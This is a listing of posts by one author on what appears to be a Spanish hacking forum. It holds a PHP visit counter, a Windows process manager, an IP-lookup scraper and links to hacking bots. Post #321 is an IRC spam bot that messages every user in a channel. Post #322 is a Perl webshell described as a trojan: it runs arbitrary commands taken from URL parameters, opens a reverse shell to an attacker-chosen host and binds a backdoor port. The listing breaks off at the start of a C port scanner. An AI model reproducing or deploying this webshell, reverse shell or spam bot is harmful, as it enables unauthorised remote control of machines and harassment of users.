
Temas - BigBear

#316
PHP / Simple contador de visitas
31 Enero 2012, 21:56 PM
Un simple contador de visitas.

La clase del contador


<?php

/*

Base de un contador de visitas 

V 0.1

Coded By Doddy H

*/


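/**
 * Minimal visit counter backed by a single MySQL table named "visitas".
 *
 * Each visit inserts one auto-increment row; the total is the row count.
 * The listing originally used the legacy mysql_* functions (removed in PHP 7)
 * and kept the connection in a local variable, so end() had nothing to close.
 * This version keeps the same public methods but uses mysqli and stores the
 * connection on the object.
 *
 * Deployment notes: the account used at runtime only needs INSERT and SELECT
 * on "visitas". instalar() and desinstalar() run DDL and should not be
 * reachable from a public request.
 */
class contador {

    /** @var mysqli|null Open connection, set by start(), cleared by end(). */
    private $link = null;

    /**
     * Connect to the server and select the database.
     *
     * @param string $host Database host.
     * @param string $user Database user.
     * @param string $pass Database password.
     * @param string $db   Database (schema) name.
     * @return bool True on success, false on any connection failure.
     */
    public function start($host, $user, $pass, $db) {
        try {
            $link = @mysqli_connect($host, $user, $pass, $db);
        } catch (Exception $e) {
            // Newer PHP versions report mysqli errors as exceptions.
            $link = false;
        }
        if (!$link) {
            return false;
        }
        $this->link = $link;
        return true;
    }

    /**
     * Close the connection opened by start(), if any.
     */
    public function end() {
        if ($this->link !== null) {
            mysqli_close($this->link);
            $this->link = null;
        }
    }

    /**
     * Create the "visitas" table.
     *
     * @return bool True when the statement succeeded.
     */
    public function instalar() {
        $sql = "CREATE TABLE visitas (
            suma INT(10) UNSIGNED NOT NULL AUTO_INCREMENT,
            PRIMARY KEY (suma)
        )";
        return $this->run($sql);
    }

    /**
     * Drop the "visitas" table.
     *
     * @return bool True when the statement succeeded.
     */
    public function desinstalar() {
        return $this->run("DROP TABLE visitas");
    }

    /**
     * Record one visit by inserting a row.
     *
     * SQL NULL (not the string 'NULL') lets AUTO_INCREMENT assign the value.
     *
     * @return bool True when the row was inserted.
     */
    public function otromas() {
        return $this->run("INSERT INTO visitas (suma) VALUES (NULL)");
    }

    /**
     * Return the number of recorded visits.
     *
     * Counts on the server instead of fetching every row to the client.
     *
     * @return int Row count, or 0 when the query cannot be run.
     */
    public function totalvisitas() {
        if ($this->link === null) {
            return 0;
        }
        try {
            $result = @mysqli_query($this->link, "SELECT COUNT(*) FROM visitas");
        } catch (Exception $e) {
            $result = false;
        }
        if (!$result) {
            return 0;
        }
        $row = mysqli_fetch_row($result);
        mysqli_free_result($result);
        return $row ? (int) $row[0] : 0;
    }

    /**
     * Run a fixed statement that returns no result set.
     *
     * Only constant SQL from this class is passed in; no request data is
     * ever concatenated into a query.
     *
     * @param string $sql Statement to execute.
     * @return bool True on success, false on failure or when not connected.
     */
    private function run($sql) {
        if ($this->link === null) {
            return false;
        }
        try {
            return @mysqli_query($this->link, $sql) !== false;
        } catch (Exception $e) {
            return false;
        }
    }

}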

// The End ? 

?>



Ejemplos de uso


<?php 

include_once("contador.php");

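$name = new contador;

// The credentials below are the sample values from the post (root with an
// empty password). A real deployment should use a dedicated account limited
// to INSERT/SELECT on the counter table, loaded from configuration.
if (!$name->start("localhost", "root", "", "contador")) {
    exit("Database connection failed");
}
//$name->instalar();
//$name->desinstalar();

$name->otromas(); // required call: records the current visit

// Cast to int so only a number can ever reach the HTML output.
$cantidad = (int) $name->totalvisitas(); // total number of visits

echo "<center><h1>Total de visitas $cantidad</h1></center>";

$name->end();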

// The End ?


?>

#317
Scripting / [Perl] Terr0r B0t 0.3
19 Enero 2012, 20:36 PM
Un bot para IRC con funciones orientadas al hacking, así como codificaciones, buscador de SQLI u otras.

http://pastebin.com/g3dxSf2C
#318
Scripting / [Perl] Project STALKER 0.7
19 Enero 2012, 20:36 PM
Un reemplazo de console CMD con las siguientes opciones

[++] Reconocer IP de un Host
[++] Capturar Links de una pagina
[++] Capturar todos los procesos activos
[++] Matar algun proceso
[++] Conectarse a donde sea con sockets
[++] Capturar metodos de un servidor HTTP
[++] Buscar paths activos para listado de directorios
[++] Encode/Decode para Hex,ASCII,Base64
[++] Scannear puertos
[++] Buscar panel de administracion
[++] Crackear un hash mediante paginas
[++] Scanner SQLI
[++] Cliente FTP y MYSQL
[++] Reconocer informacion de una ip
[++] Whois xD
[++] Navegador de archivos
[++] Scannear en google mediante dorks


http://pastebin.com/inQWXx9A
#319
Scripting / [Perl] Manager 0.3
19 Enero 2012, 20:35 PM
Un simple script para manejar los procesos en Windows.


#!usr/bin/perl
#Manager 0.3
#Written By Doddy H

use Color::Output;
Color::Output::Init;
use Win32::OLE qw(in);
use Win32::Process;

# Entry point: print the process list once, then show the options menu.
clean();
options();

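sub clean {

   # Print the banner followed by a numbered list of running processes, and
   # (re)build the package arrays that close() reads.
   #
   # Fixes over the original listing:
   #   * the arrays are reset on every call, so reload() no longer appends a
   #     second copy of the list;
   #   * every process is listed (index 0 used to be filled but never shown);
   #   * the "Process name" and "PID" columns were swapped in the output;
   #   * "\x0x30" is replaced by "\x030", assuming a Color::Output colour
   #     code like the other cprint calls was intended.
   cprint "\x0313";
   print
"\nManager 0.3\nCopyright 2012 Doddy Hackman\nMail:lepuke[at]hotmail[com]\n\n";
   cprint "\x030\n\n";

   # getprocess() returns process name => PID.
   my %process = getprocess();

   # The array names are misleading but kept, because close() indexes
   # @procer to obtain the PID: @procer holds PIDs, @pids holds names.
   # Slot 0 is a placeholder so the numbers shown to the user start at 1.
   @procer = ("");
   @pids   = ("");
   for my $name ( sort keys %process ) {
       next if $name eq "";
       push @procer, $process{$name};
       push @pids,   $name;
   }

   # Highest valid menu number; package variable as in the original.
   $limit = $#procer;

   for my $n ( 1 .. $limit ) {
       cprint "\x037";
       print
         "Process Number: [$n]\tProcess name : $pids[$n]\tPID : $procer[$n]\n";
       cprint "\x037";
   }
}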

sub options {

   # Show the menu, read one line from STDIN into $t and dispatch on it:
   # "a" closes a process, "c" exits, anything else redraws the console.
   cprint "\0035";
   print
"\n\nOptions :\n\n[a] : Close a process\n[b] Clean Console\n[c] Exit\n\n\n[+] Write you options : ";
   $t = <STDIN>;
   chomp $t;

   if ( $t eq "c" ) {
       print "\n\n[+] Written By Doddy H\n\n";
       <stdin>;    # wait for Enter before leaving
       exit(1);
   }

   if ( $t eq "a" ) {
       &close;     # the & form is needed: plain close() is the Perl builtin
       return;
   }

   # "b" and any unrecognised input both redraw.
   reload();
}

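sub close {

   # Ask for a number from the list printed by clean() and terminate that
   # process, then redraw.
   #
   # clean() stores the ProcessId values in @procer (despite the name), so
   # $procer[$numb] is the PID handed to KillProcess. The input is now checked
   # to be a whole number inside the listed range before it is used as an
   # index; the original passed whatever was typed straight through, as an
   # array slice, with an empty string as exit code.
   print "\n[+] Write the number of the process : ";
   $numb = <STDIN>;
   $numb = "" unless defined $numb;
   chomp $numb;

   if ( $numb =~ /\A[0-9]+\z/ && $numb >= 1 && $numb <= $limit ) {
       Win32::Process::KillProcess( $procer[$numb], 0 );
       print "\n\n[+] OK , Process Closed\n\n";
   }
   else {
       print "\n\n[-] Invalid process number\n\n";
   }
   <stdin>;    # wait for Enter
   reload();
}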

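sub reload {

   # Clear the console and show the process list and menu again.
   #
   # The original also ran system($0), which started a nested copy of the
   # script through the shell; after that copy exited, the list and menu were
   # shown a second time by this process. Redrawing in-process is enough.
   system("cls");
   clean();
   options();
}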

sub getprocess {

   # Ask WMI (namespace root\cimv2 on the local machine) for all
   # Win32_Process instances and return a hash of Caption => ProcessId.
   # Processes that share a caption overwrite each other, so only one PID
   # per name is returned.
   my $locator = Win32::OLE->new("WbemScripting.SWbemLocator");
   my $service = $locator->ConnectServer( "", "root\\cimv2" );

   my %pid_of;
   for my $item ( in $service->InstancesOf("Win32_Process") ) {
       my $caption = $item->{Caption};
       $pid_of{$caption} = $item->{ProcessId};
   }

   return %pid_of;
}

# The End ?

#320
Scripting / [Perl] LocateIP 0.3
19 Enero 2012, 20:35 PM
La nueva version de este programa para buscar informacion sobre un ip.


#!usr/bin/perl
#LocateIP 0.3 (C) Doddy Hackman 2012

use LWP::UserAgent;
use IO::Socket;

# Shared HTTP client used by toma(): 5 second timeout and a fixed,
# browser-like User-Agent string.
my $nave = LWP::UserAgent->new(
   timeout => 5,
   agent =>
"Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12",
);

# Banner, then either the lookup or the usage line, then the footer
# (copyright() terminates the program).
head();
$ARGV[0] ? start( $ARGV[0] ) : sintax();
copyright();

sub start {

   # Echo the requested target and hand it to infocon().
   my ($host) = @_;
   print "\n[+] Target :  $host\n";
   infocon($host);
}

sub sintax {

   # Print the one-line usage message with the script name.
   printf "\n[+] sintax : %s <web>\n", $0;
}

sub head {

   # Print the ASCII-art program banner with its surrounding blank lines.
   my $banner = q(



@      @@@@    @@@@    @    @@@@@  @@@@@     @  @@@@@
@     @    @  @    @   @      @    @         @  @    @
@     @    @  @       @ @     @    @         @  @    @
@     @    @  @       @ @     @    @         @  @    @
@     @    @  @      @   @    @    @@@@      @  @@@@@
@     @    @  @      @   @    @    @         @  @    
@     @    @  @      @@@@@    @    @         @  @    
@     @    @  @    @@     @   @    @         @  @    
@@@@@  @@@@    @@@@ @     @   @    @@@@@     @  @    



);
   print $banner;
}

sub copyright {

   # Print the footer and terminate the program with exit status 1.
   my $footer = "== --(C) Doddy Hackman 2012 -- ==";
   print "\n\n" . $footer . "\n\n";
   exit(1);
}

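sub infocon {

   # Resolve the given host to an IPv4 address, then print the location
   # fields and the reverse-IP host names scraped from two third-party sites.
   #
   # Both lookups are plain-HTTP requests, so the address being looked up is
   # visible to those sites and to anyone on the path, and the replies are
   # untrusted text. The patterns depend on the HTML those sites served when
   # the script was written.
   #
   # Changes from the original: a failed name resolution is reported instead
   # of passing undef to inet_ntoa, variables are lexical (the original
   # declared $target twice and used globals), the patterns no longer rely on
   # greedy ".*", and control characters are stripped from scraped values
   # before they are printed to the terminal.
   my $host = shift;

   my $packed = gethostbyname($host);
   unless ( defined $packed ) {
       print "[-] Not Found\n";
       copyright();    # prints the footer and exits
   }
   my $target = inet_ntoa($packed);

   # Remove control characters (including ESC) from remote text.
   my $printable = sub {
       my ($text) = @_;
       $text =~ tr/\x00-\x1f\x7f//d;
       return $text;
   };

   print "\n\n[+] Getting info\n\n\n";
   my $page = toma(
       "http://www.melissadata.com/lookups/iplocation.asp?ipaddress=$target");
   $page = "" unless defined $page;

   # Return the bold cell that follows the given label cell, or nothing.
   my $field = sub {
       my ($label) = @_;
       return
         unless $page =~ m{\Q$label\E</td><td align=[^>]*><b>(.*?)</b></td>};
       return $printable->($1);
   };

   my $city = $field->("City");
   if ( defined $city ) {
       print "[+] City : $city\n";
   }
   else {
       print "[-] Not Found\n";
       copyright();
   }

   my $country = $field->("Country");
   print "[+] Country : $country\n" if defined $country;

   my $region = $field->("State or Region");
   print "[+] State or Region : $region\n" if defined $region;

   print "\n\n[+] Getting Hosts\n\n\n";

   my $code = toma( "http://www.ip-adress.com/reverse_ip/" . $target );
   $code = "" unless defined $code;

   while ( $code =~ m{whois/(.*?)">Whois}g ) {
       my $dns = $printable->($1);
       print "[DNS] : $dns\n";
   }
}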

sub toma {

   # GET the given URL with the shared $nave client and return the response
   # body; the HTTP status is not inspected.
   my ($url) = @_;
   my $response = $nave->get($url);
   return $response->content;
}

# ¿ The End ?
#321
Scripting / [Perl] IRC Spam 0.3
19 Enero 2012, 20:34 PM
Un simple script para hacer spam molesto a cada uno de los usuarios que esten en en canal , el spam lo
pueden editar con una pagina cualquiera o lo que quieran promocionar.


#!usr/bin/perl
#IRC Spam 0.3
#Coded By Doddy H

use IO::Socket;

# Fixed message pools and nicknames; one entry of each list is picked with
# rand() further down. These literal strings are what a channel operator or
# a server-side filter would see repeated.
my @msg_users = ( "Hola",         "Chau" );          #Spam to users
my @msg_canal = ( "Hola a todos", "que ondaaa" );    #Spam to canal
my @bots      = ( "Jebus",        "Ramona" );        #Names of the bots

# Print the banner.
&head;

# Exactly two arguments are expected: <server> and <channel>.
unless ( @ARGV == 2 ) {

   &sintax;

}
else {

   print "\n[+] Connecting\n\n";

   # Plain-text TCP connection to the given server on the fixed port 6667.
   if (
       my $socket = new IO::Socket::INET(
           PeerAddr => $ARGV[0],
           PeerPort => 6667,
           Proto    => "tcp"
       )
     )
   {

       # Register with a nickname taken at random from @bots and join the
       # channel given as second argument.
       my $nombre = $bots[ rand(@bots) ];

       chomp $nombre;

       print $socket "NICK $nombre\r\n";
       print $socket "USER $nombre 1 1 1 1\r\n";
       print $socket "JOIN $ARGV[1]\r\n";

       print "[+] Spammer Online\n\n";

       # Read the server's lines one at a time.
       while ( my $log = <$socket> ) {

           chomp $log;

           # Reply to the server's PING with the same payload.
           if ( $log =~ /^PING(.*)$/i ) {
               print $socket "PONG $1\r\n";
           }

           # A line containing numeric 353; capture group 4 is taken below as
           # a space-separated nickname list.
           if ( $log =~ m/:(.*) 353 (.*) = (.*) :(.*)/ig ) {

               # Repeats indefinitely over the nickname list captured from
               # this one line. Observable pattern per round: a 10 s pause,
               # one channel message, a 3 s pause, then one line per listed
               # nickname other than the bot's own.
               while (true) {

                   my $pro = $4;

                   sleep 10;

                   print $socket "PRIVMSG $ARGV[1] "
                     . $msg_canal[ rand(@msg_canal) ] . "\r\n";
                   my @nicks = split " ", $pro;

                   sleep 3;

                   foreach $names (@nicks) {
                       unless ( $nombre eq $names ) {

                           # Drops the first "@" from the entry before use.
                           $names =~ s/\@//;
                           print $socket
                             "MSG $names $msg_users[rand(@msg_users)]\r\n";
                           print "[+] Spam : $names !\n";
                       }
                   }
               }
           }
       }
   }
   else {
       print "[-] Error\n";
   }
}

# Print the footer.
&copyright;

sub sintax {

   # Print the usage line with the script name.
   printf "\n[+] : %s <server> <channel>\n", $0;
}

sub head {

   # Print the ASCII-art banner with its surrounding blank lines.
   my $banner = qq(

@  @@@@@    @@@@      @@@   @@@@@    @    @     @  @     @  @@@@@  @@@@@
@  @    @  @    @    @   @  @    @   @    @     @  @     @  @      @    @
@  @    @  @         @      @    @  @ @   @@   @@  @@   @@  @      @    @
@  @    @  @         @      @    @  @ @   @@   @@  @@   @@  @      @    @
@  @@@@@   @          @@@   @@@@@  @   @  @ @ @ @  @ @ @ @  @@@@   @@@@@
@  @    @  @             @  @      @   @  @ @ @ @  @ @ @ @  @      @    @
@  @    @  @             @  @      @@@@@  @  @  @  @  @  @  @      @    @
@  @    @  @    @    @   @  @     @     @ @  @  @  @  @  @  @      @    @
@  @    @   @@@@      @@@   @     @     @ @     @  @     @  @@@@@  @    @


);

   print $banner;

}

sub copyright {

   # Print the footer line.
   my $footer = "(C) Doddy Hackman 2012";
   print "\n\n" . $footer . "\n\n";
}

# The End ?

#322
Scripting / [Perl] Commander 0.3
19 Enero 2012, 20:34 PM
Una mejora de un troyano al estilo webshell que habia hecho el verano pasado.


#!usr/bin/perl
#
#C0mmand3r (C) Doddy HAckman 2012
#Version 0.3
#
#A simple WebShell in Perl
#
#

use IO::Socket;
use CGI;
use Cwd;
use Win32;

# TCP port the listener below binds to.
my $port = rep();

# Return the listening port: the first command-line argument converted with
# int(), or 777 when no (or a false) argument is given. The value is not
# range-checked.
sub rep {
   unless ( $ARGV[0] ) {
       return int("777");    #Your Can Edit 666
   }
   else {
       return int( $ARGV[0] );
   }
}

# Startup banner on the local console, including the chosen port.
print "\n\n#########################################\n\n";
print "C0mmand3r (C) Doddy HAckman 2012\n\n\n";
print "[+] Starting the webshell on port $port\n\n";
print "#########################################\n\n";

# Listening TCP socket. LocalHost is 'localhost', so as written the listener
# is bound to the loopback name only. The result of the constructor is not
# checked.
# Defender note: nothing in this listing authenticates a client or encrypts
# the connection, so every handler in the accept loop below is available to
# anything that can reach this port. A perl process listening on an
# unexpected port and spawning shell children is the behaviour to look for.
my $sock = new IO::Socket::INET(
   LocalHost => 'localhost',
   LocalPort => $port,
   Proto     => 'tcp',
   Listen    => SOMAXCONN,
   Reuse     => 1
);

while ( $jebus = $sock->accept() ) {

   print $jebus "HTTP/1.1 200/OK\r\nContent-type:text/html\r\n\r\n";

#print $jebus "HTTP/1.1 200/OK\r\nContent-type:application/w-www-form-urlencoded\r\n\r\n";
   next if $slave = fork;

   close $sock;

   while ( $response = <$jebus> ) {

       chomp($response);

       my %rta;

       if ( $response =~ /GET/ig ) {
           capturar($response);
       }

       # Parse one request line of the form "GET /<path> HTTP/1.1" and store
       # up to two "name=value" pairs from its query string in %rta.
       # The values are stored exactly as received: nothing is URL-decoded,
       # validated or restricted here, and the handlers later use them
       # directly (including as a command line).
       sub capturar {
           my $aa = shift;
           chomp $aa;
           if ( $aa =~ /GET \/(.*) HTTP\/1.1/ig ) {
               my $todo = $1;

               # Two-parameter form: ?a=b&c=d
               if ( $todo =~ /\?(.*)=(.*)&(.*)=(.*)/ig ) {
                   $rta{$1} = $2;
                   $rta{$3} = $4;
               }

               # Single-parameter form: ?a=b (also tried after the form above)
               if ( $todo =~ /\?(.*)=(.*)/ig ) {
                   $rta{$1} = $2;
               }
           }

       }

       print $jebus "

<style type=text/css>


.main {
margin : -287px 0px 0px -490px;
border : White solid 1px;
BORDER-COLOR: #00FF00;
}

#pie {
position: absolute;
bottom: 0;
}

body,a:link {
font: normal 16px Verdana, Arial, Helvetica,
sans-serif;
background-color: #000000;
color:#00FF00;
Courier New;
cursor:crosshair;
font-size: small;
}

input,table.outset,table.bord,table,textarea,select,fieldset {
background-color:black;color:#00FF00;
border: solid 1px #00FF00;
border-color:#00FF00
}

a:link,a:visited,a:active {
color: #00FF00;
font: normal 16px Verdana, Arial, Helvetica,
sans-serif;
text-decoration: none;
}

</style>

";

       if ( $rta{'info'} ) {

           info();

           print $jebus "<center><br><br><b>IP : </b>" . get_ip() . "<br>";
           print $jebus "<center><br><br><b>Domain : </b>"
             . Win32::DomainName() . "<br>";
           print $jebus "<b>Chip : </b>" . Win32::GetChipName() . "<br>";
           print $jebus "<b>OS : </b>" . Win32::GetOSName() . "<br>";
           print $jebus "<b>Version : </b>" . Win32::GetOSVersion() . "<br>";
           print $jebus "<b>User : </b>"
             . Win32::LoginName()
             . "<br><br></center>";
           copyright();

       }

       elsif ( $rta{'console'} ) {
           logouno();
           print $jebus "
<br><br><center>
<form action='' method=GET>
Command : <input type=text name=cmd value=ver><input type=submit value=Execute>
</center></form><br><br>
";
           copyright();
       }

       elsif ( $rta{'cmd'} ) {
           logouno();
           $lucha = $rta{'cmd'};
           print $jebus "<br><br><center><fieldset>";
           $lucha =~ s/\+/ /;
           print $jebus "<br>[+] Command : <b>$lucha</b><br><br>";
           print $jebus qx($lucha);
           print $jebus "</center></fieldset>";
           copyright();
       }

       elsif ( $rta{'reverse'} ) {

           logodos();

           print $jebus qq(
<center>
<br><br><b>ReverseShell</b><br><br>
<form action='' method=GET>
<b>Your IP</B> : <input type=text name=ipconnect value=localhost><br>
<b>Port</b> : <input type=text name=port value=666><br>
<br><input type=submit value=Connect></form><br><br>
</center>
);

           copyright();
       }

       elsif ( $rta{'ipconnect'} ) {

           conectar( $rta{'ipconnect'}, $rta{'port'} );
           tipo();

           # Open an outbound TCP connection to host $_[0], port $_[1] (both
           # taken from request parameters by the caller) and re-open STDIN,
           # STDOUT and STDERR onto that socket. None of the calls is checked.
           # Defender note: after this, any child process inherits the socket
           # as its standard handles; an interpreter or shell whose standard
           # handles are a network socket is a strong detection signal.
           sub conectar {
               socket( REVERSE, PF_INET, SOCK_STREAM, getprotobyname("tcp") );
               connect( REVERSE, sockaddr_in( $_[1], inet_aton( $_[0] ) ) );
               open( STDIN,  ">&REVERSE" );
               open( STDOUT, ">&REVERSE" );
               open( STDERR, ">&REVERSE" );
           }

           # Print a start message and host details, then run the platform's
           # command interpreter: cmd.exe when $^O matches Win32, otherwise
           # an interactive sh with TERM set to xterm. Called right after
           # conectar(), so the interpreter runs on the redirected handles.
           # Defender note: the process tree is perl -> cmd.exe or perl -> sh.
           sub tipo {
               print "\n[*] Reverse Shell Starting...\n\n";
               if ( $^O =~ /Win32/ig ) {
                   infowin();
                   system("cmd.exe");
               }
               else {
                   infolinux();

                   #root();
                   system("export TERM=xterm;exec sh -i");
               }
           }

           # Print the Windows domain name, OS name and login name (from the
           # Win32 module) to STDOUT.
           sub infowin {
               print "[+] Domain Name : " . Win32::DomainName() . "\n";
               print "[+] OS Version : " . Win32::GetOSName() . "\n";
               print "[+] Username : " . Win32::LoginName() . "\n\n\n";
           }

           # Print a heading and the output of "uname -a" to STDOUT.
           sub infolinux {
               print "[+] System information\n\n";
               system("uname -a");
               print "\n\n";
           }
       }

       elsif ( $rta{'backdoor'} ) {

           logotres();

           print $jebus qq(
<center>
<br><br><b>BindPort</b><br><br>
<form action='' method=GET>
<b>Port</b> : <input type=text name=portbind value=666><br>
<br><input type=submit value=Bind></form><br><br>
</center>
);

           copyright();

       }

       elsif ( $rta{'portbind'} ) {

           $backdoor = IO::Socket::INET->new(
               Proto     => 'tcp',
               LocalPort => $rta{'portbind'},
               Listen    => SOMAXC,
               Reuse     => 1
           );

           while ( $jesus = $backdoor->accept() ) {
               $jesus->autoflush(1);
               print $jesus
                 "[*] Heaven_Door Online\n[*] Port : 25256\n[*] PID : "
                 . $$ . "\n\n";
               print $jesus "Welcome  " . $jesus->peerhost . "\n\n";
               &extras;
               $dir = getcwd();
               print $jesus $dir . ">>";
               while (<$jesus>) {
                   my $yeah = qx($_);
                   print $jesus "\n\n" . $yeah . "\n\n";
                   print $jesus $dir . ">>";
               }
           }

           # Send host details to the connected client ($jesus): Windows
           # domain, OS and login name in the first branch, "uname -a" output
           # in the second.
           # NOTE(review): the condition matches $^O against an empty
           # pattern, so it does not actually test for a platform name;
           # confirm which branch runs in practice.
           sub extras {

               if ( $^O =~ //ig ) {
                   print $jesus "[+] Domain Name : "
                     . Win32::DomainName() . "\n";
                   print $jesus "[+] OS Version : "
                     . Win32::GetOSName() . "\n";
                   print $jesus "[+] Username : "
                     . Win32::LoginName()
                     . "\n\n\n";
               }
               else {
                   $s = qx("uname -a");
                   print $jesus "--==System Info==--\n\n" . $s;
               }
           }
       }

       elsif ( $rta{'about'} ) {

           about();

           print $jebus qq(
<pre><center>

                                         
                ¾¾¾¾¾¾¾¾¾¾¾              
            ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾          
          ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾          
        ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾        
        ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾        
       ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾      
      ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾      
      ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾      
      ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾      
       ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾      
       ¾¾¾¾¾¾¾  ¾¾¾¾¾¾¾¾¾¾¾    ¾¾¾¾      
        ¾¾¾¾       ¾¾¾¾¾¾      ¾¾¾¾      
         ¾¾¾      ¾¾¾ ¾¾¾      ¾¾¾        
         ¾¾¾¾¾¾¾¾¾¾¾   ¾¾¾   ¾¾¾¾          
          ¾¾¾¾¾¾¾¾¾     ¾¾¾¾¾¾¾¾¾        
          ¾¾¾¾¾¾¾¾¾  ¾  ¾¾¾¾¾¾¾¾¾        
          ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾        
               ¾¾¾¾¾¾¾¾¾¾¾¾¾              
             ¾  ¾¾¾¾¾¾¾¾¾¾  ¾            
             ¾    ¾ ¾¾¾¾ ¾  ¾            
             ¾ ¾¾          ¾¾            
    ¾¾¾      ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾            
   ¾¾¾¾¾      ¾¾¾¾¾¾¾¾¾¾¾¾¾¾      ¾¾¾    
   ¾¾¾¾¾¾¾      ¾¾¾¾¾¾¾¾¾¾¾      ¾¾¾¾¾¾  
   ¾¾¾¾¾¾¾¾¾¾      ¾¾¾         ¾¾¾¾¾¾¾¾¾  
    ¾¾¾  ¾¾¾¾¾¾             ¾¾¾¾¾¾¾¾¾¾¾  
             ¾¾¾¾¾¾     ¾¾¾¾¾¾¾          
                ¾¾¾¾¾¾¾¾¾¾¾¾              
                 ¾¾¾¾¾¾¾¾¾                
              ¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾            
          ¾¾¾¾¾¾¾         ¾¾¾¾¾¾¾        
      ¾¾¾¾¾¾¾                ¾¾¾¾¾¾¾¾¾¾  
 ¾¾¾¾¾¾¾¾                       ¾¾¾¾¾¾¾¾  
 ¾¾¾¾¾¾                           ¾¾¾¾¾¾  
  ¾¾¾¾                             ¾¾¾¾  
                                         

</pre></center>

);

           copyright();

       }
       else {
           print $jebus "
<title>Commander 0.3 (C) Doddy Hackman 2012</title>
<br><br>
<h1><center>Commander</center></h1>
<br><br>
<center>
<table border=1>
<td class=main><center><b>Tools</b></center></td><tr>
<td class=main><a href=?info=true><center>Information</center></a></td><tr>
<td class=main><a href=?console=true><center>Console</center></a></td><tr>
<td class=main><a href=?backdoor=true><center>Backdoor</center></a></td><tr>
<td class=main><a href=?reverse=true><center>ReverseShell</center></a></td><tr>
<td class=main><a href=?about=true><center>About</center></a></td>
</table>
</center>
";
           copyright();
       }
       $jebus->close;
   }
}
continue {
   $jebus->close;
}

# Send the ASCII-art heading used by the console and command pages to the
# current client ($jebus).
sub logouno {
   print $jebus qq(

<pre><center>


   @@@@@@@@                                                  @@            
 @@        @@                                                @@            
 @@                                                          @@            
 @@              @@@@@@    @@  @@@@      @@@@      @@@@@@    @@    @@@@@@  
 @@            @@      @@  @@@@    @@  @@    @@  @@      @@  @@  @@      @@
 @@            @@      @@  @@      @@    @@      @@      @@  @@  @@@@@@@@@@
 @@            @@      @@  @@      @@      @@    @@      @@  @@  @@        
 @@        @@  @@      @@  @@      @@  @@    @@  @@      @@  @@  @@      @@
   @@@@@@@@      @@@@@@    @@      @@    @@@@      @@@@@@    @@    @@@@@@  


</pre></center>
);
}

# Send the ASCII-art heading used by the reverse-connection form page to the
# current client ($jebus).
sub logodos {
   print $jebus qq(
<pre><center>


 @@@@@@@@@@                                                                    
 @@        @@                                                                  
 @@        @@                                                                  
 @@        @@      @@@@@@    @@      @@    @@@@@@    @@@@    @@@@      @@@@@@  
 @@@@@@@@@@      @@      @@  @@      @@  @@      @@  @@    @@    @@  @@      @@
 @@        @@    @@@@@@@@@@    @@  @@    @@@@@@@@@@  @@      @@      @@@@@@@@@@
 @@        @@    @@            @@  @@    @@          @@        @@    @@        
 @@        @@    @@      @@      @@      @@      @@  @@    @@    @@  @@      @@
 @@        @@      @@@@@@        @@        @@@@@@    @@      @@@@      @@@@@@  


</pre></center>
);
}

# Send the ASCII-art heading used by the bind-port form page to the current
# client ($jebus).
sub logotres {

   print $jebus qq(
<pre><center>

 @@@@@@@@                              @@                  @@                              
 @@      @@                            @@                  @@                              
 @@      @@                            @@                  @@                              
 @@      @@      @@@@@@      @@@@@@    @@    @@      @@@@@@@@    @@@@@@      @@@@@@    @@@@
 @@@@@@@@              @@  @@      @@  @@  @@      @@      @@  @@      @@  @@      @@  @@  
 @@      @@      @@@@@@@@  @@          @@@@        @@      @@  @@      @@  @@      @@  @@  
 @@      @@    @@      @@  @@          @@  @@      @@      @@  @@      @@  @@      @@  @@  
 @@      @@    @@      @@  @@      @@  @@    @@    @@      @@  @@      @@  @@      @@  @@  
 @@@@@@@@        @@@@@@@@    @@@@@@    @@      @@    @@@@@@@@    @@@@@@      @@@@@@    @@  


</pre></center>
);
}

# Send the ASCII-art heading of the "about" page to the current client
# ($jebus).
sub about {

   print $jebus qq(
<pre><center>


     @@        @@                                      
     @@        @@                                  @@  
   @@  @@      @@                                  @@  
   @@  @@      @@@@@@@@      @@@@@@    @@      @@  @@@@
 @@      @@    @@      @@  @@      @@  @@      @@  @@  
 @@      @@    @@      @@  @@      @@  @@      @@  @@  
 @@@@@@@@@@    @@      @@  @@      @@  @@      @@  @@  
@@          @@  @@      @@  @@      @@  @@    @@@@  @@  
@@          @@  @@@@@@@@      @@@@@@      @@@@  @@    @@


</pre></center>
);

}

# Send the ASCII-art heading of the system-information page to the current
# client ($jebus).
sub info {

   print $jebus qq(
<pre><center>


 @@    @@        @@    @@@@@@@@@@    @@@@@@@@  
 @@    @@@@      @@    @@          @@        @@
 @@    @@@@      @@    @@          @@        @@
 @@    @@  @@    @@    @@          @@        @@
 @@    @@  @@    @@    @@@@@@@@    @@        @@
 @@    @@    @@  @@    @@          @@        @@
 @@    @@      @@@@    @@          @@        @@
 @@    @@      @@@@    @@          @@        @@
 @@    @@        @@    @@            @@@@@@@@  


</pre></center>
);

}

# Resolve the empty host name and return the result as a dotted-quad string.
# NOTE(review): presumably meant to yield this machine's own address; the
# gethostbyname result is not checked before inet_ntoa — confirm behaviour.
sub get_ip {
   my $get = gethostbyname("");
   return inet_ntoa($get);
}

# Send the page footer to the current client ($jebus) and terminate the
# current process with exit status 1. The handlers call this as their last
# step, so each request ends the process that served it.
sub copyright {
   print $jebus
     "<br><br><br><br><center><h1>Coded By Doddy H</h2></center><br><br>";
   exit(1);
}

# The End ?

#323
Programación C/C++ / [C] ScanPort
8 Enero 2012, 18:42 PM
Un simple programa para scannear puertos, solo funciona bajo linux.


/**
* ScanPort 0.1
* Coded by Doddy H
**/

#include<stdio.h>
#include<stdlib.h>
